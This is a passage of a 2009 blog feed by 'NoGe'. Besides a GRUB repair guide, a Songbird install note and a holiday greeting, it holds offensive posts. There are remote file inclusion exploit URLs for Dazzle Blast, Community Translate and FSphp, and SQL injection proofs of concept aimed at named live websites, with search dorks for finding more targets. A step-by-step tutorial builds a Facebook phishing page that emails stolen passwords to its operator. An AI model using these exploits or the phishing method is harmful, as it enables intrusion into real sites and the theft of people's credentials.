type='html'>&lt;pre&gt;&lt;br /&gt;yesterday when i turn on my computer and guess what&lt;br /&gt;tadaaa!! i got Error 17 while loading GRUB. wtf is this? lol&lt;br /&gt;i cant login to ubuntu or windoz&lt;br /&gt;so i take the ubuntu installation cd put into CDROM&lt;br /&gt;rebbot and setting BIOS booting via CDROM&lt;br /&gt;after booting from CDROM now you choose&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;rescue a broken system&lt;/span&gt;&lt;br /&gt;then follow the instruction there&lt;br /&gt;then you will be promt an root directory options&lt;br /&gt;choose your root directory&lt;br /&gt;my root directory is &lt;span style="font-weight: bold;"&gt;/dev/sda6&lt;/span&gt;&lt;br /&gt;next step is &lt;span style="font-weight: bold;"&gt;enter rescue mode&lt;/span&gt;&lt;br /&gt;and select &lt;span style="font-weight: bold;"&gt;reinstall GRUB boot loader&lt;/span&gt;&lt;br /&gt;enter your device there&lt;br /&gt;for example my device is &lt;span style="font-weight: bold;"&gt;(hd0,5)&lt;/span&gt;&lt;br /&gt;just type like that then continue and reboot&lt;br /&gt;now my GRUB loader running just fine.. :))&lt;br /&gt;&lt;br /&gt;another way to fix the error that i found in internet is&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;booting from CDROM with your LiveCD&lt;br /&gt;open &lt;span style="font-weight: bold;"&gt;Terminal&lt;/span&gt;&lt;br /&gt;type &lt;span style="font-weight: bold;"&gt;sudo GRUB&lt;/span&gt;&lt;br /&gt;you will be in GRUB mode right now&lt;br /&gt;now type &lt;span style="font-weight: bold;"&gt;find /boot/GRUB/stage1&lt;/span&gt;&lt;br /&gt;that command will show your linux device location such as &lt;span style="font-weight: bold;"&gt;hd0,5&lt;/span&gt;&lt;br /&gt;now type &lt;span style="font-weight: bold;"&gt;root (hd0,5)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;setup (hd0)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;quit&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;reboot&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./NoGe&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-5908404750805072682?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/5908404750805072682/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=5908404750805072682' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/5908404750805072682'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/5908404750805072682'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/10/ubuntu-grub-error-17-solved.html' title='ubuntu GRUB Error 17 [solved]'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-66058629942510429</id><published>2009-10-06T11:27:00.003+07:00</published><updated>2009-10-06T11:55:38.986+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='linux'/><category scheme='http://www.blogger.com/atom/ns#' term='mixed'/><title type='text'>SongBird Browser</title><content type='html'>&lt;pre&gt;&lt;br /&gt;Songbird is a desktop media player mashed-up with the Web.&lt;br /&gt;Songbird is a player and a platform. Like Firefox, Songbird is an open source,&lt;br /&gt;Open Web project built on the Mozilla platform. Songbird provides a&lt;br /&gt;public playground for Web media mash-ups by providing developers with&lt;br /&gt;both desktop and Web APIs, developer resources and fostering Open Web&lt;br /&gt;media standards, to wit, an Open Media Web.&lt;br /&gt;&lt;br /&gt;this is my SongBird screenshot&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_dxtzvQwAPwE/SsrLedD9itI/AAAAAAAAAEY/SElRRgiOsac/s1600-h/songbird.png"&gt;&lt;img style="cursor: pointer; width: 320px; height: 240px;" src="http://3.bp.blogspot.com/_dxtzvQwAPwE/SsrLedD9itI/AAAAAAAAAEY/SElRRgiOsac/s320/songbird.png" alt="" id="BLOGGER_PHOTO_ID_5389343628159978194" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;for ubuntu user can install it by type this in console&lt;br /&gt;&lt;br /&gt;# apt-get install songbird&lt;br /&gt;&lt;br /&gt;for another linux distro and another operating system can download it here&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.getsongbird.com/download/"&gt;http://www.getsongbird.com/download/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;you should try this at home!!&lt;br /&gt;have fun with SongBird.. :))&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./NoGe&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-66058629942510429?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/66058629942510429/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=66058629942510429' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/66058629942510429'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/66058629942510429'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/10/songbird-browser.html' title='SongBird Browser'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_dxtzvQwAPwE/SsrLedD9itI/AAAAAAAAAEY/SElRRgiOsac/s72-c/songbird.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-2367880113249453579</id><published>2009-10-02T11:59:00.003+07:00</published><updated>2009-10-02T12:06:48.859+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Dazzle Blast RFI Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;&lt;br /&gt;[o] Dazzle Blast Remote File Inclusion Vulnerability&lt;br /&gt;&lt;/span&gt;Software : Dazzle Blast&lt;br /&gt;Download : http://www.dazzleblast.com/dazzleblast.zip&lt;br /&gt;Author   : NoGe&lt;br /&gt;Contact  : noge[dot]code[at]gmail[dot]com&lt;br /&gt;Blog     : http://evilc0de.blogspot.com/&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;[o] Vulnerable file&lt;br /&gt;&lt;/span&gt;require_once($ROOTDIR.'admin/functions/general.php');&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;admin/includes/createemails.php&lt;br /&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;[o] Exploit&lt;br /&gt;&lt;/span&gt;http://localhost/[path]/admin/includes/createemails.php?ROOTDIR=[evilc0de]&lt;span class="fullpost"&gt;&lt;span&gt;&lt;span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-2367880113249453579?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/2367880113249453579/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=2367880113249453579' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2367880113249453579'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2367880113249453579'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/10/dazzle-blast-rfi-vuln.html' title='Dazzle Blast RFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-7941590704195326055</id><published>2009-10-02T11:55:00.001+07:00</published><updated>2009-10-02T11:58:26.995+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Community Translate RFI Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;&lt;br /&gt;[o] Community Translate Remote File Inclusion Vulnerability&lt;br /&gt;&lt;/span&gt;Software     : Community Translate&lt;br /&gt;Project Home : http://code.google.com/p/communitytranslate/&lt;br /&gt;Author       : NoGe&lt;br /&gt;Contact      : noge[dot]code[at]gmail[dot]com&lt;br /&gt;Blog         : http://evilc0de.blogspot.com/&lt;br /&gt;Home         : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;br /&gt;require_once("$rd/include/utilfunctions.php");&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;include/functions.php&lt;span&gt;&lt;br /&gt;&lt;span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/&lt;/span&gt;&lt;/span&gt;include/functions.php&lt;span&gt;&lt;span&gt;?rd=[evilc0de]&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-7941590704195326055?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/7941590704195326055/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=7941590704195326055' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/7941590704195326055'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/7941590704195326055'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/10/community-translate-rfi-vuln.html' title='Community Translate RFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-7568253091662169583</id><published>2009-09-20T07:19:00.004+07:00</published><updated>2009-09-20T07:26:56.857+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mixed'/><title type='text'>Met Lebaraaaaaaaannn... :))</title><content type='html'>&lt;pre&gt;&lt;br /&gt;buat teman2 yang ngerayain idul fitri gw ngucapin&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;SELAMAT HARI RAYA IDUL FITRI 1430 H&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;MOHON MAAF HARI BATIN&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;maafin gw yah kalo ada salah na.. :))&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./NoGe&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-7568253091662169583?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/7568253091662169583/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=7568253091662169583' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/7568253091662169583'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/7568253091662169583'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/09/met-lebaraaaaaaaannn.html' title='Met Lebaraaaaaaaannn... :))'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-237708436591518973</id><published>2009-09-17T16:27:00.003+07:00</published><updated>2009-09-17T16:41:50.244+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>FSphp 0.2.1 Multiple RFI Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] FSphp 0.2.1 Multiple Remote File Inclusion Vulnerability&lt;br /&gt;&lt;/span&gt;Software : FSphp version 0.2.1&lt;br /&gt;Vendor   : http://fsphp.sourceforge.net/&lt;br /&gt;Download : http://sourceforge.net/projects/fsphp/&lt;br /&gt;Author   : NoGe&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;br /&gt;include_once $FSPHP_LIB . "/path.php" ;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;lib/FSphp.php&lt;br /&gt;lib/navigation.php&lt;br /&gt;lib/pathwirte.php&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/lib/FSphp.php?FSPHP_LIB=[evilc0de]&lt;br /&gt;http://localhost/[path]/lib/navigation.php?FSPHP_LIB=[evilc0de]&lt;br /&gt;http://localhost/[path]/lib/pathwirte.php?FSPHP_LIB=[evilc0de]&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-237708436591518973?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/237708436591518973/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=237708436591518973' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/237708436591518973'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/237708436591518973'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/09/fsphp-021-multiple-rfi-vuln.html' title='FSphp 0.2.1 Multiple RFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-2093479459214865920</id><published>2009-09-16T18:36:00.004+07:00</published><updated>2009-09-16T18:45:12.576+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Regental Medien Blind SQL Injection Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;"&gt;[o] Regental Medien Blind SQL Injection Vulnerability&lt;br /&gt;&lt;/span&gt;Software : Regental Medien&lt;br /&gt;Vendor   : http://www.regental-medien.de/&lt;br /&gt;Author   : NoGe&lt;br /&gt;Home     : http://antisecurity.org&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;br /&gt;index.php&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?mainid=[SQL]&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Proof of Concept&lt;/span&gt;&lt;br /&gt;http://demo15.rm-websystem.de/index.php?mainid=9+and+substring(@@version,1,1)=4 &lt;&lt; TRUE&lt;br /&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;http://demo15.rm-websystem.de/index.php?mainid=9+and+substring(@@version,1,1)=5 &lt;&lt; FALSE&lt;br /&gt;http://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1)=4 &lt;&lt; TRUE&lt;br /&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;http://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1)=5 &lt;&lt; FALSE&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;"powered by regental medien&lt;/span&gt;&lt;em&gt;&lt;/em&gt;&lt;span class="fullpost"&gt;"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Note&lt;/span&gt;&lt;br /&gt;this is a private script&lt;br /&gt;all target are in one IP address&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-2093479459214865920?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/2093479459214865920/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=2093479459214865920' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2093479459214865920'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2093479459214865920'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/09/regental-medien-blind-sql-injection.html' title='Regental Medien Blind SQL Injection Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-2774283241197451574</id><published>2009-09-15T00:16:00.010+07:00</published><updated>2009-09-15T15:38:00.309+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><category scheme='http://www.blogger.com/atom/ns#' term='mixed'/><title type='text'>how to make an simple fake login</title><content type='html'>&lt;pre&gt;&lt;br /&gt;in this tutorial i will show you how to make a very simple facebook fake login&lt;br /&gt;this is not a true login just an simple scampage&lt;br /&gt;&lt;br /&gt;first u have to make 2 php file&lt;br /&gt;- &lt;span style="font-weight: bold;"&gt;index.php&lt;/span&gt;&lt;br /&gt;- &lt;span style="font-weight: bold;"&gt;noge.php&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;open &lt;span style="font-weight: bold;"&gt;noge.php&lt;/span&gt; and put this script&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_dxtzvQwAPwE/Sq57FbhAcLI/AAAAAAAAAEA/_1dy_TdLnCA/s1600-h/noge.png"&gt;&lt;img style="cursor: pointer; width: 320px; height: 110px;" src="http://2.bp.blogspot.com/_dxtzvQwAPwE/Sq57FbhAcLI/AAAAAAAAAEA/_1dy_TdLnCA/s320/noge.png" alt="" id="BLOGGER_PHOTO_ID_5381373937970081970" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;i use image to post the source coz blogspot dont allow it&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;now open &lt;span style="font-weight: bold;"&gt;http://www.facebook.com/&lt;/span&gt;&lt;br /&gt;view the source or &lt;span style="font-weight: bold;"&gt;crtl+u&lt;/span&gt; copy all source and paste it into &lt;span style="font-weight: bold;"&gt;index.php&lt;/span&gt;&lt;br /&gt;now &lt;span style="font-weight: bold;"&gt;ctrl+f&lt;/span&gt; in&lt;span style="font-weight: bold;"&gt; index.php&lt;/span&gt; and find this &gt;&gt; &lt;span style="font-weight: bold;"&gt;action=&lt;/span&gt;&lt;br /&gt;you will find this line&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;method="POST" action="https://login.facebook.com/login.php?login_attempt=1"&lt;/span&gt;&lt;br /&gt;that is a link to login facebook&lt;br /&gt;change &lt;span style="font-weight: bold;"&gt;https://login.facebook.com/login.php?login_attempt=1&lt;/span&gt; with &lt;span style="font-weight: bold;"&gt;noge.php&lt;/span&gt;&lt;br /&gt;so that line will like this now&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;method="POST" action="noge.php"&lt;/span&gt;&lt;br /&gt;save it&lt;br /&gt;&lt;br /&gt;now upload facebook scampage into your host&lt;br /&gt;this is the example of facebook fake login&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_dxtzvQwAPwE/Sq561RWWUuI/AAAAAAAAAD4/i084Vwp-TdQ/s1600-h/indexfb.png"&gt;&lt;img style="cursor: pointer; width: 320px; height: 240px;" src="http://4.bp.blogspot.com/_dxtzvQwAPwE/Sq561RWWUuI/AAAAAAAAAD4/i084Vwp-TdQ/s320/indexfb.png" alt="" id="BLOGGER_PHOTO_ID_5381373660363117282" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;fill the email and password for test like pic above then click Login&lt;br /&gt;after it you will be redirect to &lt;span style="font-weight: bold;"&gt;https://login.facebook.com/login.php?login_attempt=1&lt;/span&gt;&lt;br /&gt;now check your email that you put in &lt;span style="font-weight: bold;"&gt;noge.php&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;this is the result in your email&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_dxtzvQwAPwE/Sq57OwaYmGI/AAAAAAAAAEI/L_y7M6zQST0/s1600-h/email1.png"&gt;&lt;img style="cursor: pointer; width: 320px; height: 87px;" src="http://4.bp.blogspot.com/_dxtzvQwAPwE/Sq57OwaYmGI/AAAAAAAAAEI/L_y7M6zQST0/s320/email1.png" alt="" id="BLOGGER_PHOTO_ID_5381374098198272098" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_dxtzvQwAPwE/Sq57YZqaQSI/AAAAAAAAAEQ/h1azAbXQ8IM/s1600-h/email2.png"&gt;&lt;img style="cursor: pointer; width: 320px; height: 106px;" src="http://4.bp.blogspot.com/_dxtzvQwAPwE/Sq57YZqaQSI/AAAAAAAAAEQ/h1azAbXQ8IM/s320/email2.png" alt="" id="BLOGGER_PHOTO_ID_5381374263890166050" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;email : fake_login@fuckbook.com&lt;br /&gt;password : password&lt;br /&gt;&lt;br /&gt;this is for education purpose only&lt;br /&gt;use it at your own risk&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-2774283241197451574?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/2774283241197451574/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=2774283241197451574' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2774283241197451574'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2774283241197451574'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/09/how-to-make-simple-fake-login.html' title='how to make an simple fake login'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_dxtzvQwAPwE/Sq57FbhAcLI/AAAAAAAAAEA/_1dy_TdLnCA/s72-c/noge.png' height='72' width='72'/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-3729764678798961581</id><published>2009-09-12T18:46:00.002+07:00</published><updated>2009-09-12T19:03:23.250+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>IndexScript 3.0 SQL Injection Vuln</title><content type='html'>&lt;pre&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] IndexScript 3.0 SQL Injection Vulnerability&lt;br /&gt;&lt;/span&gt;Software : IndexScript version 3.0&lt;br /&gt;Vendor   : http://www.indexscript.com/&lt;br /&gt;Download : http://www.indexscript.com/download.php&lt;br /&gt;Author   : NoGe&lt;br /&gt;Home     : http://antisecurity.org&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;br /&gt;more.php&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/more.php?cat_id=[SQL]&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Proof of Concept&lt;/span&gt;&lt;br /&gt;http://texxsmith.com/directory/more.php?cat_id=-3+union+select+1,2,3,4,5,version(),database(),user(),9--&lt;br /&gt;http://www.internetkatalogen.net/more.php?cat_id=-77+union+select+1,2,3,4,5,version(),database(),user(),9--&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;"powered by IndexScript"&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-3729764678798961581?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/3729764678798961581/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=3729764678798961581' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3729764678798961581'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3729764678798961581'/><link rel='alternate' type='text/html' 